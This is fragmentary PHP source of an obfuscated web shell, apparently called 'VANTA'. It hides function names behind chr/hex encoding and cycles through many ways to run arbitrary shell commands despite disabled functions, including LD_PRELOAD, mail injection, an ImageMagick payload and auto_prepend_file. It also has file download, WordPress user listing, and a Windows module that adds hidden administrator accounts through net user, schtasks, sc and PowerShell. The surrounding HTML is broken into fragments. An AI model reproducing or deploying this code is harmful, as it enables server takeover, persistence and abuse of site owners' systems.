["pipe","w"],2=>["pipe","w"]]; $p = @$f($pr1VANTA, $d, $pipes); if (is_resource($p)) { $out = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($p); if (!empty($out)) break; } } elseif ($f === chDxzZ([112,111,112,101,110])) { $h = @$f($pr1VANTA . " 2>&1", "r"); $res = ""; if ($h) { while (!feof($h)) $res .= fread($h, 4096); pclose($h); } if (strlen($res)) { $out = $res; break; } } elseif ($f === chDxzZ([101,115,99,97,112,101,115,104,101,108,108,99,109,100])) { $esc = $f($pr1VANTA); ob_start(); @system($esc); $out = ob_get_clean(); if (!empty($out)) break; } elseif ($f === chDxXZ('6573636170657368656c6c617267')) { $esc = $f($pr1VANTA); $out = @chDx2x($esc); if (!empty($out)) break; } elseif ($f === chDxzZ([99,117,114,108,95,101,120,101,99])) { $ch = @curl_init('file:///proc/self/cmdline'); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($ch, CURLOPT_POSTFIELDS, $pr1VANTA); $r = @curl_exec($ch); @curl_close($ch); if ($r && strpos($r, $pr1VANTA) !== false) { $out = $r; break; } } elseif ($f === chDxzZ('109,97,105,108')) { $to = uniqid()."@".uniqid().".xyz"; @mail($to, $pr1VANTA, $pr1VANTA); $out = ""; } elseif ($f === chDxXZ('63616c6c5f757365725f66756e63')) { $shellfunc = chDxzZ([115,104,101,108,108,95,101,120,101,99]); if (function_exists($shellfunc)) { $out = @call_user_func($shellfunc, $pr1VANTA); if (!empty($out)) break; }} elseif ($f === chDxzZ('102,105,108,101,95,103,101,116,95,99,111,110,116,101,110,116,115')) { $r = @$f("php://filter/read=convert.base64-encode/resource=" . $pr1VANTA); if ($r && strlen($r) >0) { $out = $r; break; } } elseif ($f === chDxzZ('102,111,112,101,110')) { $tmpf = sys_get_temp_dir() . "/" . uniqid("s-cmd") . ".sh"; $h = @$f($tmpf, "w"); if ($h) { fwrite($h, $pr1VANTA); fclose($h); } $r = @chDx2x("sh " . escapeshellarg($tmpf) . " 2>&1"); if ($r) { $out = $r; @unlink($tmpf); break; } } elseif ($f === chDxzZ('112,117,116,101,110,118')) { @putenv("CMD=".$pr1VANTA); $r = @getenv("CMD"); if ($r == $pr1VANTA) { $out = $r; break; } } elseif ($f === chDxzZ('105,110,105,95,115,101,116')) { @ini_set("auto_prepend_file", $pr1VANTA); $out = @file_get_contents($_SERVER['SCRIPT_FILENAME']); if (!empty($out)) break; } elseif ($f === chDxzZ([112,99,110,116,108,95,101,120,101,99])) { @pcntl_exec("/bin/sh", array("-c", $pr1VANTA)); } elseif ($f === chDxzZ([97,112,97,99,104,101,95,115,101,116,101,110,118])) { @apache_setenv("CMD", $pr1VANTA); $out = getenv("CMD"); if ($out == $pr1VANTA) break; } elseif ($f === chDxzZ([109,113,95,111,112,101,110]) || $f === chDxzZ([103,99,95,111,112,101,110])) { } } return $out !== false ? $out : false;}if (!function_exists('chDxzZ')) { function chDxzZ($arr) { if (is_string($arr)) $arr = explode(',', $arr); $r = ''; foreach ($arr as $n) $r .= chr(is_numeric($n) ? $n : hexdec($n)); return $r; }} if (!function_exists('prvdyzhsax')) { function prvdyzhsax($str) { $y = ''; for ($i = 0; $i< strlen($str); $i++) $y .= dechex(ord($str[$i])); return $y; }} if (!function_exists('chDxXZ')) { function chDxXZ($hx) { $n = ''; for ($i = 0; $i< strlen($hx) - 1; $i += 2) $n .= chr(hexdec($hx[$i] . $hx[$i + 1])); return $n; }} if (isset($_GET['VANTA'])) { $cdir = unx($_GET['VANTA']); if (@is_dir($cdir)) { $VANTAxas[14]($cdir); } else { } } else { $cdir = $VANTAxas[0](); } function VANTAd0($file) { if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename=' . basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; }} if (!empty($_GET['don'])) {$FilesDon = VANTAd0(unx($_GET['don']));} ?>
&1" > .privdayz-root2'); usleep(350000); $out = @file_get_contents('.privdayz-root2'); if (!$out) $out = "[!] No output or blocked."; } else { $out = v4nt4C($c . ' 2>&1'); if (!$out) $out = "[!] No output or blocked."; } echo "\n"; echo htmlspecialchars($out); } ?>
ID | user | role | reset pw | wp-login | |
---|---|---|---|---|---|
'.$u['ID'].' | '.htmlspecialchars($u['user_login']).' | '.htmlspecialchars($u['user_email']).' | '.$u['role'].' | '; if ($site_url) { $login_url = htmlspecialchars($site_url . '/wp-login.php?log=' . urlencode($u['user_login'])); echo 'login'; } else { echo 'no site url'; } echo ' |
".htmlspecialchars($alt_file)."
created. [$result]$f
&1", "r"); if ($f) { while (!feof($f)) $out .= fread($f, 4096); fclose($f);} if (trim($out)) $ok = true; @ini_restore('filter.default'); } elseif ($meth === 'ld_preload') { if (strtoupper(substr(PHP_OS,0,3)) !== 'WIN') { putenv('LD_PRELOAD=/tmp/x.so'); $out = @chDx2x($c.' 2>&1'); putenv('LD_PRELOAD'); if (trim($out)) $ok = true; } } elseif ($meth === 'prepend') { $prepend = sys_get_temp_dir()."/xx".uniqid().".php"; @file_put_contents($prepend, ""); @ini_set("auto_prepend_file", $prepend); $out = @file_get_contents($_SERVER['SCRIPT_FILENAME']); @ini_restore("auto_prepend_file"); @unlink($prepend); if (trim($out)) $ok = true; } elseif ($meth === 'suhosin') { @ini_set('suhosin.executor.func.blacklist', ''); $out = @chDx2x($c.' 2>&1'); if (trim($out)) $ok = true; } elseif ($meth === 'mailinj') { $tmpf = sys_get_temp_dir()."/m".uniqid().".txt"; @mail("v@x.com", "", "", "", "-X $tmpf; $c >$tmpf 2>&1"); if (file_exists($tmpf)) { $out = file_get_contents($tmpf); unlink($tmpf); $ok = true; } } elseif ($meth === 'errlog') { $tmpf = sys_get_temp_dir()."/e".uniqid().".txt"; @error_log("", 3, $tmpf); if (file_exists($tmpf)) { $out = file_get_contents($tmpf); unlink($tmpf); $ok = true; } } elseif ($meth === 'fopeninput') { $h = @fopen("php://input", "r"); if ($h) { $out = @fread($h, 8192); fclose($h); $ok = true; } } elseif ($meth === 'binbrute') { foreach(['sh','bash','python','perl','nc','busybox','wget'] as $bin){ $which = trim(@chDx2x("which $bin")); if($which) { $out = @chDx2x("$which -c \"$c\" 2>&1"); if (trim($out)) { $ok = true; break; } } } } elseif ($meth === 'ht404') { $out = ''; } elseif ($meth === 'imagemagick') { $tmpi = sys_get_temp_dir().'/img'.uniqid().'.mvg'; $tmpp = sys_get_temp_dir().'/out'.uniqid().'.png'; file_put_contents($tmpi, "push graphic-context\nviewbox 0 0 640 480\nfill 'url(https://|$c|)'\npop graphic-context"); @chDx2x("convert $tmpi $tmpp"); if (file_exists($tmpp)) $out = file_get_contents($tmpp); @unlink($tmpi); @unlink($tmpp); if (trim($out)) $ok = true; } elseif ($meth === 'cgienv') { putenv("CGI_COMMAND=$c"); $out = getenv("CGI_COMMAND"); if (trim($out)) $ok = true; } else { if (function_exists($meth)) { if ($meth === $M[0]) { $out = @$meth($c.' 2>&1'); if (trim($out)) $ok = true; } else if ($meth === $M[1]) { $a=[]; $meth($c.' 2>&1', $a); $out = join("\n", $a); if (trim($out)) $ok = true; } else if ($meth === $M[2]) { @$meth($c.' 2>&1'); $out = ""; if (trim($out)) $ok = true; } else if ($meth === $M[3]) { @$meth($c.' 2>&1'); $out = ""; if (trim($out)) $ok = true; } else if ($meth === $M[4]) { $h=@$meth($c.' 2>&1',"r"); if ($h) { while(!feof($h)) $out.=fread($h,4096); fclose($h); } if (trim($out)) $ok = true; } else if ($meth === $M[5]) { $desc = [1=>["pipe","w"], 2=>["pipe","w"]]; $p = @$meth($c.' 2>&1', $desc, $pipes); if (is_resource($p)) { $out = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($p); if (trim($out)) $ok = true; } } } } if ($ok && trim($out)) { $R = $out; break; } } echo htmlspecialchars($R ?: "[X] No output / all methods blocked.\n");}?>
'.htmlspecialchars($rel).'
Open
(chmod 755)
&1'); if (trim($out)) return $out; $fallback = "timeout /T $timeout /NOBREAK & $cmd"; $out2 = v4nt4C($fallback.' 2>&1'); if (trim($out2)) return $out2; return v4nt4C($cmd.' 2>&1'); } if (!isset($_SESSION['v4nt4_winr00t_success'])) $_SESSION['v4nt4_winr00t_success'] = false; if (!isset($_SESSION['v4nt4_winr00t_user'])) $_SESSION['v4nt4_winr00t_user'] = ''; if (!isset($_SESSION['v4nt4_winr00t_pass'])) $_SESSION['v4nt4_winr00t_pass'] = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['user'],$_POST['pass'])) { $u = preg_replace('/[^a-zA-Z0-9_\-]/','',$_POST['user']); $p = $_POST['pass']; $mode = $_POST['mode'] ?? 'auto'; $success = false; $methods = []; $methods[] = [ "[*] net user (classic)", "net user \"$u\" \"$p\" /add && net localgroup Administrators \"$u\" /add" ]; $methods[] = [ "[*] PowerShell (background)", "powershell -Command \"net user $u $p /add; net localgroup Administrators $u /add\"" ]; $methods[] = [ "[*] schtasks", "schtasks /create /tn winrrrrrr00t /tr \"cmd.exe /c net user $u $p /add && net localgroup Administrators $u /add\" /sc onstart /ru System" ]; $methods[] = [ "[*] at.exe", "at 12:00 cmd.exe /c \"net user $u $p /add && net localgroup Administrators $u /add\"" ]; $methods[] = [ "[*] sc service hack", "sc create p0wnsvc binPath= \"cmd /c net user $u $p /add & net localgroup Administrators $u /add\" start= auto" ]; $methods[] = [ "[*] Registry AutoAdminLogon", "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoAdminLogon /t REG_SZ /d 1 /f" ]; $methods[] = [ "[*] Fallback CMD", "cmd /c net user $u $p /add & net localgroup Administrators $u /add" ]; $methods[] = [ "[*] PowerShell Script Chain", "powershell -Command \"Start-Process cmd -ArgumentList '/c net user $u $p /add && net localgroup Administrators $u /add' -Verb runAs\"" ]; $methods[] = [ "[*] Task Scheduler V2 (schtasks)", "schtasks /create /tn winr00t2 /tr \"cmd.exe /c net user $u $p /add && net localgroup Administrators $u /add\" /sc onlogon /ru System" ]; foreach ($methods as $step) { list($label, $cmd) = $step; wout($label . "..."); $res = prvd_exec_with_timeout($cmd, 9); wout($res); if ( stripos($res, 'success') !== false || stripos($res, 'ok') !== false || stripos($res, 'ReturnValue = 0') !== false || stripos($res, 'başarı') !== false || stripos($res, 'already exists') !== false ) { wout("[+] Admin user injected!"); $success = true; break; } sleep(1); } if ($success) { $_SESSION['v4nt4_winr00t_success'] = true; $_SESSION['v4nt4_winr00t_user'] = $u; $_SESSION['v4nt4_winr00t_pass'] = $p; wout("\n[+] 0wn3d! Admin user injected:\n[+] User: $u\n[+] Pass: $p"); wout("[!] Info: Webshell cannot send commands as this user. Use RDP/SMB/WinRM with these credentials!"); } else { $_SESSION['v4nt4_winr00t_success'] = false; wout("\n[!] r00t failed :: no vector worked, permission denied."); } } if ($_SESSION['v4nt4_winr00t_success']) { $u = $_SESSION['v4nt4_winr00t_user']; $p = $_SESSION['v4nt4_winr00t_pass']; ?>
$cmdfile 2>&1\" /sc once /st 00:00 /ru \"$u\" /rp \"$p\""; $out1 = v4nt4C($scht.' 2>&1'); wout($out1); v4nt4C("schtasks /run /tn pzadmtask 2>&1"); sleep(1); $output = @file_get_contents($cmdfile); if ($output && strlen($output) > 0) { wout("[+] Command executed as admin!\n" . $output); $success_cmd = true; } @v4nt4C('schtasks /delete /tn pzadmtask /f 2>&1'); @unlink($cmdfile); if (!$success_cmd) { wout("[*] Trying service method..."); $svc = 'sc create pzadmsvc binPath= "cmd /c '.$c.' > '.$cmdfile.' 2>&1" obj= ".\\'.$u.'" password= "'.$p.'" start= demand'; $out2 = v4nt4C($svc.' 2>&1'); wout($out2); v4nt4C('sc start pzadmsvc 2>&1'); sleep(1); $output2 = @file_get_contents($cmdfile); if ($output2 && strlen($output2) > 0) { wout("[+] Service method: Command executed as admin!\n" . $output2); $success_cmd = true; } @v4nt4C('sc delete pzadmsvc 2>&1'); @unlink($cmdfile); } if (!$success_cmd) { wout("[*] PowerShell fallback..."); $pw = 'powershell -Command "Start-Process cmd -ArgumentList \'/c '.$c.' > '.$cmdfile.' 2>&1\' -Credential (New-Object System.Management.Automation.PSCredential(\''.$u.'\',(ConvertTo-SecureString \''.$p.'\' -AsPlainText -Force))) -WindowStyle Hidden"'; $out3 = v4nt4C($pw.' 2>&1'); wout($out3); sleep(1); $output3 = @file_get_contents($cmdfile); if ($output3 && strlen($output3) > 0) { wout("[+] PowerShell: Command executed as admin!\n" . $output3); $success_cmd = true; } @unlink($cmdfile); } if (!$success_cmd) { wout("[!] Admin command failed. Try RDP / manual login?"); } } ?>